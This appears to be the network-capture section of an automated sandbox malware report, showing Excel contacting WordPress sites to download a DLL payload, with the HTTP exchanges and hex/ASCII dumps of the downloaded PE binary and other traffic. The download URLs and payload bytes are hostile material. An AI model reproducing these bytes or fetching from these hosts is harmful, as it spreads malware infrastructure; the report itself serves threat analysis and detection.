                                                    May 23, 2022 09:19:19.644619942 CEST403INData Raw: 6b 90 62 c7 85 64 0a 00 00 eb 25 55 63 c7 85 68 0a 00 00 8b 75 0b ca c7 85 6c 0a 00 00 b2 2b a7 93 c7 85 70 0a 00 00 48 36 64 a0 c7 85 74 0a 00 00 ea 18 bc 62 c7 85 78 0a 00 00 41 9b 1e e8 c7 85 7c 0a 00 00 33 26 07 a3 c7 85 80 0a 00 00 10 66 98
                                                    Data Ascii: kbd%Uchul+pH6dtbxA|3&fH!`AnMK3*l?xuOKx(7&).Rtp9:|e:NKf
                                                    May 23, 2022 09:19:19.644639015 CEST404INData Raw: 89 51 f0 48 89 51 f8 75 d8 eb 94 66 0f 1f 44 00 00 48 0f c3 11 48 0f c3 51 08 48 0f c3 51 10 48 83 c1 40 48 0f c3 51 d8 48 0f c3 51 e0 49 ff c9 48 0f c3 51 e8 48 0f c3 51 f0 48 0f c3 51 f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c
                                                    Data Ascii: QHQufDHHQHQH@HQHQIHQHQHQu$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tH
                                                    May 23, 2022 09:19:19.644658089 CEST405INData Raw: 00 00 48 8b 84 24 c8 00 00 00 48 8b 40 08 48 89 44 24 78 48 8b 84 24 c8 00 00 00 48 8b 4c 24 78 48 8b 00 48 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04
                                                    Data Ascii: H$H@HD$xH$HL$xHH+HD$hH$H@8H$H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|
                                                    May 23, 2022 09:19:19.802902937 CEST407INData Raw: d2 48 8b 4c 24 30 e8 62 00 00 00 ff 15 74 e2 01 00 48 8b 4c 24 30 89 01 48 8b 44 24 30 48 c7 40 08 ff ff ff ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15
                                                    Data Ascii: HL$0btHL$0HD$0H@HHH(=%rtrrRH(HT$HL$H(HD$0HHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0H


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.2249175193.143.77.3480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    May 23, 2022 09:19:29.019248009 CEST1152OUTGET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: kabeonet.pl
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:31.049067020 CEST1153INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 23 May 2022 07:19:29 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, Keep-Alive
                                                    Location: http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/
                                                    Content-Length: 0
                                                    Keep-Alive: timeout=2, max=100
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    5192.168.2.2249176193.143.77.3480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    May 23, 2022 09:19:31.166353941 CEST1153OUTGET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: www.kabeonet.pl
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:32.260165930 CEST1155INHTTP/1.1 404 Not Found
                                                    Date: Mon, 23 May 2022 07:19:31 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://www.kabeonet.pl/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, Keep-Alive
                                                    Keep-Alive: timeout=2, max=100
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 31 31 66 30 30 0d 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 26 20 21 28 49 45 20 38 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 09 09 0d 0a 09 09 09 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 73 74 72 6f 6e 79 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 09 09 0d 0a 09 09 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 09 09 0d 0a 20 20 20 20 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 38 2e 39 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 5f 50 4c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 72 6f 6e 79 20 6e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 2d 20 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a
                                                    Data Ascii: 11f00<!DOCTYPE html>...[if IE 7]><html class="ie ie7" lang="pl-PL"><![endif]-->...[if IE 8]><html class="ie ie8" lang="pl-PL"><![endif]-->...[if !(IE 7) & !(IE 8)]>...><html lang="pl-PL">...<![endif]--><head><meta charset="UTF-8" /><title>Nie znaleziono stronyProjektowanie stron internetowych Opole</title><link rel="profile" href="http://gmpg.org/xfn/11"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href='https://fonts.googleapis.com/css?family=Roboto:400,100,300&subset=latin,latin-ext' rel='stylesheet' type='text/css'> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v18.9 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="pl_PL" /><meta property="og:title" content="Strony nie znaleziono - Projektowanie stron internetowych Opole" /><meta property="og:
                                                    May 23, 2022 09:19:32.260215998 CEST1156INData Raw: 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70
                                                    Data Ascii: site_name" content="Projektowanie stron internetowych Opole" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.kabeonet.pl/#organization","na
                                                    May 23, 2022 09:19:32.260242939 CEST1158INData Raw: 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c
                                                    Data Ascii: bootstrapcdn.com' /><link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel='dns-prefetch' href='//c0.wp.com' /><link rel='dns-prefetch' href='//i0.wp.com' /><script type="text/javascript">
                                                    May 23, 2022 09:19:32.260267973 CEST1159INData Raw: 21 73 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 29 26 26 21 73 28 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 35 36 31 32
                                                    Data Ascii: !s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,
                                                    May 23, 2022 09:19:32.260291100 CEST1160INData Raw: 6e 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73
                                                    Data Ascii: nt;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.9.3/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><style id=
                                                    May 23, 2022 09:19:32.260314941 CEST1162INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                                    Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,
                                                    May 23, 2022 09:19:32.260339975 CEST1163INData Raw: 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25
                                                    Data Ascii: dient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight
                                                    May 23, 2022 09:19:32.260365963 CEST1164INData Raw: 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d
                                                    Data Ascii: eset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-ligh
                                                    May 23, 2022 09:19:32.260392904 CEST1166INData Raw: 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61
                                                    Data Ascii: r: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--pr
                                                    May 23, 2022 09:19:32.260417938 CEST1167INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72
                                                    Data Ascii: p--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !im
                                                    May 23, 2022 09:19:32.302309036 CEST1169INData Raw: 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c
                                                    Data Ascii: -blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-grad


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249172188.114.97.10443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    2022-05-23 07:19:15 UTC0OUTGET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: vipteck.com
                                                    Connection: Keep-Alive
                                                    2022-05-23 07:19:16 UTC0INHTTP/1.1 200 OK
                                                    Date: Mon, 23 May 2022 07:19:16 GMT
                                                    Content-Type: application/x-msdownload
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Powered-By: PHP/7.4.29
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 23 May 2022 07:19:15 GMT
                                                    Content-Disposition: attachment; filename="RD05UTHGkitvIJt.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Set-Cookie: 628b3573f41f6=1653290355; expires=Mon, 23-May-2022 07:20:15 GMT; Max-Age=60; path=/
                                                    Vary: X-Forwarded-Proto,Accept-Encoding
                                                    Last-Modified: Mon, 23 May 2022 07:19:15 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uPGWh%2BTiTHd2spFyuiEQ%2BYMvxNhN71WSSVJXCPqUmf9cs2f%2F7%2ByAB4JMZ8nYZX%2FgWhqp9ARVVqv9ddK8psWR4NnUtqrBjxVIw5NunB3WUyxM6577g%2B94d1sCHXt0oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 70fc05b35dce9945-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    2022-05-23 07:19:16 UTC1INData Raw: 35 37 32 32 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00
                                                    Data Ascii: 5722MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b
                                                    2022-05-23 07:19:16 UTC1INData Raw: 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03
                                                    Data Ascii: " 5T@P .text
                                                    2022-05-23 07:19:16 UTC3INData Raw: 8b c6 41 ff cb 48 03 c7 4c 2b c0 90 0f b6 10 42 0f b6 0c 00 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2 74 0f 49 83 c1 04 49 83 c2 02 45 85 db 75 cc eb 0b 41 0f b7 02 8b 5c 85 00 48 03 df 48 8b 6c 24 10 48 8b 74 24 20 48 8b c3 48 8b 5c 24 18 5f c3 cc cc cc cc cc cc cc cc cc cc cc 40 55 56 48 8d ac 24 28 f5 ff ff 48 81 ec d8 0b 00 00 48 8b 05 4f 9d 02 00 48 33 c4 48 89 85 c0 0a 00 00 ff ca 48 8b f1 0f 85 0d 1e 00 00 c7 44 24 20 06 b8 27 4e c7 44 24 24 56 1d 6f 1b c7 44 24 28 66 37 32 01 c7 44 24 2c 71 1e 2f 28 c7 44 24 30 0f 18 a6 c3 c7 44 24 34 0e 50 b7 d5 c7 44 24 38 99 12 d0 80 c7 44 24 3c fd 77 43 35 c7 44 24 40 42 aa a1 1d c7 44 24 44 4d 19 67 1d c7 44 24 48 6a 2f c8 8b c7 44 24 4c 7c ff 1a 27 c7 44 24 50 04 fc b5 20 c7 44 24 54 2e 23 ee 28 c7 44 24 58 09
                                                    Data Ascii: AHL+B+uHutIIEuA\HHl$Ht$ HH\$_@UVH$(HHOH3HHD$ 'ND$$VoD$(f72D$,q/(D$0D$4PD$8D$<wC5D$@BD$DMgD$Hj/D$L|'D$P D$T.#(D$X
                                                    2022-05-23 07:19:16 UTC4INData Raw: 85 6c 01 00 00 e7 db 60 3d c7 85 70 01 00 00 4d 31 33 55 c7 85 74 01 00 00 80 6c d6 3d c7 85 78 01 00 00 4d 70 1c a6 c7 85 7c 01 00 00 22 0a af 0c c7 85 80 01 00 00 0e 46 5f 51 c7 85 84 01 00 00 69 35 3e ce c7 85 88 01 00 00 61 55 4a 27 c7 85 8c 01 00 00 a7 91 3a ec c7 85 90 01 00 00 34 4e 53 0b c7 85 94 01 00 00 ef 71 a6 1a c7 85 98 01 00 00 56 f7 7d b5 c7 85 9c 01 00 00 21 40 43 2b c7 85 a0 01 00 00 e8 ac fa 24 c7 85 a4 01 00 00 55 39 ac 6f c7 85 a8 01 00 00 4c 20 5d 31 c7 85 ac 01 00 00 78 6a 16 c5 c7 85 b0 01 00 00 68 69 11 37 c7 85 b4 01 00 00 99 94 6c d4 c7 85 b8 01 00 00 35 4d 68 18 c7 85 bc 01 00 00 a6 2b 0e 20 c7 85 c0 01 00 00 0d 19 a6 12 c7 85 c4 01 00 00 d8 28 11 5e c7 85 c8 01 00 00 0f b8 3c 42 c7 85 cc 01 00 00 a1 1c 61 52 c7 85 d0 01 00 00
                                                    Data Ascii: l`=pM13Utl=xMp|"F_Qi5>aUJ':4NSqV}!@C+$U9oL ]1xjhi7l5Mh+ (^<BaR
                                                    2022-05-23 07:19:16 UTC5INData Raw: c7 85 90 03 00 00 25 38 e1 23 c7 85 94 03 00 00 50 00 71 ad c7 85 98 03 00 00 f2 66 61 01 c7 85 9c 03 00 00 50 38 75 1e c7 85 a0 03 00 00 ed 3f 78 3f c7 85 a4 03 00 00 a7 21 50 a9 c7 85 a8 03 00 00 17 ff 32 af c7 85 ac 03 00 00 9a c6 3e 5b c7 85 b0 03 00 00 24 39 33 31 c7 85 b4 03 00 00 64 ee a9 4d c7 85 b8 03 00 00 3c 4d 7d 4f c7 85 bc 03 00 00 1b 70 2b db c7 85 c0 03 00 00 94 6c 58 50 c7 85 c4 03 00 00 67 56 57 48 c7 85 c8 03 00 00 47 ae 85 5f c7 85 cc 03 00 00 51 6c 79 4f c7 85 d0 03 00 00 3e 0d 7e ee c7 85 d4 03 00 00 bf 5d 45 72 c7 85 d8 03 00 00 2b f3 27 1b c7 85 dc 03 00 00 0e e7 fd 79 c7 85 e0 03 00 00 db a9 32 35 c7 85 e4 03 00 00 3c 2d 07 15 c7 85 e8 03 00 00 5b 2d 22 84 c7 85 ec 03 00 00 a5 6a 69 2e c7 85 f0 03 00 00 2b 68 0f cb c7 85 f4 03 00
                                                    Data Ascii: %8#PqfaP8u?x?!P2>[$931dM<M}Op+lXPgVWHG_QlyO>~]Er+'y25<-[-"ji.+h
                                                    2022-05-23 07:19:16 UTC7INData Raw: 07 c7 85 b4 05 00 00 96 71 e6 27 c7 85 b8 05 00 00 6b 49 c5 f3 c7 85 bc 05 00 00 23 ab b6 58 c7 85 c0 05 00 00 33 fa f1 9d c7 85 c4 05 00 00 77 26 65 64 c7 85 c8 05 00 00 b4 1c 4a 19 c7 85 cc 05 00 00 08 ac 62 e5 c7 85 d0 05 00 00 44 29 27 55 c7 85 d4 05 00 00 e6 ae 74 fd c7 85 d8 05 00 00 53 7d 70 6e c7 85 dc 05 00 00 6c 15 46 bf c7 85 e0 05 00 00 26 f3 2a 67 c7 85 e4 05 00 00 0a 61 f4 3a c7 85 e8 05 00 00 64 ad 42 bb c7 85 ec 05 00 00 71 ee a5 2e c7 85 f0 05 00 00 5e 5c 54 fa c7 85 f4 05 00 00 68 de 94 7b c7 85 f8 05 00 00 2a 68 00 0a c7 85 fc 05 00 00 08 d4 fe 5e c7 85 00 06 00 00 48 3c 42 b5 c7 85 04 06 00 00 0a 67 40 24 c7 85 08 06 00 00 1b f2 ee c8 c7 85 0c 06 00 00 50 2b 6f 6f c7 85 10 06 00 00 e3 a7 66 65 c7 85 14 06 00 00 99 18 e1 75 c7 85 18 06
                                                    Data Ascii: q'kI#X3w&edJbD)'UtS}pnlF&*ga:dBq.^\Th{*h^H<Bg@$P+oofeu
                                                    2022-05-23 07:19:16 UTC8INData Raw: e8 5b c7 85 d8 07 00 00 9a c1 49 12 c7 85 dc 07 00 00 d2 ae 37 3f c7 85 e0 07 00 00 c8 f5 39 69 c7 85 e4 07 00 00 b5 1c 7d 70 c7 85 e8 07 00 00 13 71 22 9c c7 85 ec 07 00 00 83 26 0c 72 c7 85 f0 07 00 00 5d 10 c0 7d c7 85 f4 07 00 00 b5 31 40 43 c7 85 f8 07 00 00 22 56 e1 32 c7 85 fc 07 00 00 a9 01 1d 4b c7 85 00 08 00 00 4d e1 44 6a c7 85 04 08 00 00 11 0d e3 1a c7 85 08 08 00 00 6c 1e 01 ba c7 85 0c 08 00 00 b8 27 bf f0 c7 85 10 08 00 00 17 fa af 50 c7 85 14 08 00 00 19 a8 a8 22 c7 85 18 08 00 00 2d 7b ea 2a c7 85 1c 08 00 00 63 57 18 32 c7 85 20 08 00 00 3e c8 79 55 c7 85 24 08 00 00 5a 8d fc 0c c7 85 28 08 00 00 f1 a1 58 2f c7 85 2c 08 00 00 50 bc 27 0d c7 85 30 08 00 00 48 50 e0 5a c7 85 34 08 00 00 ca c3 9a 21 c7 85 38 08 00 00 e0 90 6a 96 c7 85 3c
                                                    Data Ascii: [I7?9i}pq"&r]}1@C"V2KMDjl'P"-{*cW2 >yU$Z(X/,P'0HPZ4!8j<
